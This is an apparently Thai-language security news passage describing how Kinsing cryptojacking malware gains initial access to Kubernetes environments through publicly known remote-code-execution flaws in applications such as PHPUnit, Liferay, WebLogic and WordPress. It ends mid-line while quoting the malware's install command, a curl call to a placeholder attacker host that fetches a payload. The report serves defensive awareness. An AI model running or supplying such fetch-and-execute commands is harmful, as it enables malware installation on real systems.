Kinsing malware เป็น malware ที่มุ่งเป้าโจมไปที่ Linux environments เพื่อทำการ Cryptojacking โดยทีม Microsoft Defender for Cloud ได้สังเกตเห็นพฤติกรรม Initial access เทคนิคของ Kinsing malware ที่ใช้ในการโจมตี Kubernetes environments ซึ่งหลัก ๆ แบ่งออกได้เป็นสองวิธีดังนี้

วิธีที่ 1 Container Image มีช่องโหว่

Kinsing malware จะพยาม scan หา container ที่มีช่องโหว่ RCE (Remote Code Execution) ที่เคยมีการเปิดเผยต่อสาธารณะแล้ว ตัวอย่าง application ที่เคยโจมตีเช่น:

PHPUnit
Liferay
WebLogic
Wordpress

หลังจากที่ได้ Remote access แล้ว Kinsing จะใช้ shell command เพื่อทำการติดตั้ง malware

“/bin/bash -c (curl -s Attacker_IP/Payload_Name.